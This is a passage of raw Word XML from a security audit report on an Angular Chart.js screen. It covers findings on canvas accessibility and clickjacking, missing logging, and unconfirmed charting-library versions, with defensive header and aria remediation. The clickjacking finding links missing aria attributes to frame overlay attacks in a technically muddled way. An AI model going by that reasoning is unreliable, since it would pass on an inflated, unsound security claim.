              </w:rPr>
              <w:t xml:space="preserve">Component</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">ChartjsComponent</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">— Chart.js</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">&lt;canvas&gt;</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">element rendering</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">Affected Data</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Chart visualizations; screen reader accessible content</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Description:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Section 17 of the documentation identifies: "The absence of any accessibility considerations for Chart.js canvas elements is a known gap in chart-based UIs that should be addressed." The development team is credited for documenting this gap. From a security perspective,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;canvas&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">elements without accessible fallback content (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">aria-label</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">role</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, or inner text fallback) can be exploited in clickjacking scenarios where an attacker overlays a transparent canvas over a sensitive UI element. Additionally, without explicit</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">aria</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">attributes, assistive technologies may interact with canvas elements in unpredictable ways that could be leveraged in social engineering attacks targeting users with disabilities.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Evidence:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Section 17 of the Chartjs screen documentation states: "The absence of any accessibility considerations for Chart.js canvas elements is a known gap in chart-based UIs that should be addressed." (Development team credited for documenting this known issue.)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Attack Scenario:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">An attacker constructs a page that iframes</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/charts/chartjs</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">and overlays a transparent</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;canvas&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">element over a "confirm payment" button on the attacker's page. Because the Chart.js canvas has no explicit</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">aria</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">role or pointer-events restriction, the visual overlap is not detectable by standard browser clickjacking defenses that rely on frame-busting scripts. This is a low-probability scenario but is relevant if the application does not implement</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">X-Frame-Options</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">or</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Content-Security-Policy: frame-ancestors</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">headers.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Remediation:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1009"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Add</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">aria-label</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">and</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">role="img"</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">attributes to all Chart.js</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;canvas&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">elements in the template:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1000"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">canvas</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OtherTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> role</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"img"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OtherTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> aria-label</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"Bar chart showing monthly revenue by region"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt;&lt;/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">canvas</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1009"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Implement</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">X-Frame-Options: DENY</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">or</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Content-Security-Policy: frame-ancestors 'none'</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">HTTP response headers at the server/CDN level to prevent the application from being embedded in iframes.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1009"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Verify by using a screen reader (e.g., NVDA, VoiceOver) to confirm that chart elements are announced meaningfully, and by attempting to embed the page in an iframe from a different origin — the browser should block the embedding.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">[Not documented — WHO: the DevOps or infrastructure team; WHAT: Are</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">X-Frame-Options</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">or</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Content-Security-Policy: frame-ancestors</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">HTTP headers currently configured on the application's web server or CDN?; WHERE: Insert confirmed header configuration into the Remediation section of SEC-007]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Source Evidence:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Chartjs (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/charts/chartjs</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) — Section 17</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">SEC-008: No Security Logging or Monitoring — Chartjs Screen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Severity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Info</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">OWASP Category</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">A09 — Security Logging &amp; Monitoring Failures</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">CWE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">CWE-778: Insufficient Logging</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">AVSV Requirement</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">V7.1.3 — Verify that security-relevant events including successful and failed authentication events are logged</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">Component</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">ChartjsComponent</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">— observability instrumentation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">Affected Data</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Security event audit trail</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Description:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">The documentation confirms that no logging or monitoring instrumentation is present in</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">ChartjsComponent</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. This is consistent with the pattern observed in</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink w:anchor="sec-004">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">SEC-004</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">for the parent Charts shell. Section 10 explicitly states: "There are no logging or monitoring instrumentation calls in this component — no</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">console.log</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">console.warn</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">console.error</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, no Sentry/DataDog/LogRocket calls, and no analytics event tracking." While a static presentational component has minimal logging requirements, the complete absence of any observability integration means that Chart.js rendering failures, unexpected data states, or unauthorized access events at this route are invisible to security monitoring.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Evidence:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Section 10 of the Chartjs screen documentation states: "There are</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">no logging or monitoring instrumentation calls</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">in this component — no</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">console.log</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">console.warn</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">console.error</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, no Sentry/DataDog/LogRocket calls, and no analytics event tracking (PostHog, Mixpanel, Google Analytics)."</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Attack Scenario:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">See</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink w:anchor="sec-004">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">SEC-004</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">for the shared attack scenario. The absence of logging across the entire charts module means that a systematic probing of all chart routes would generate no security alerts.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Remediation:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">See</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink w:anchor="sec-004">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">SEC-004</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">remediation steps. Apply the same centralized</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">ErrorHandler</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">integration to cover this route.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Source Evidence:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Chartjs (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/charts/chartjs</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) — Section 10</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">SEC-009: Unconfirmed Third-Party Dependency Versions — Chart.js and ng2-charts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Severity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Info</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">OWASP Category</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">A06 — Vulnerable &amp; Outdated Components</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">CWE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">CWE-1104: Use of Unmaintained Third-Party Components</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">AVSV Requirement</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">V14.2.1 — Verify that all components are up to date, preferably using a dependency checker during build or compile time</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">Component</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">ChartjsComponent</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">— Chart.js and Angular wrapper library dependency</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">Affected Data</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Client-side rendering integrity; potential for known CVEs in charting library</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Description:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">The documentation identifies Chart.js as the underlying visualization engine and notes that an Angular wrapper such as</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">ng2-charts</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">or</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">ngx-charts</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
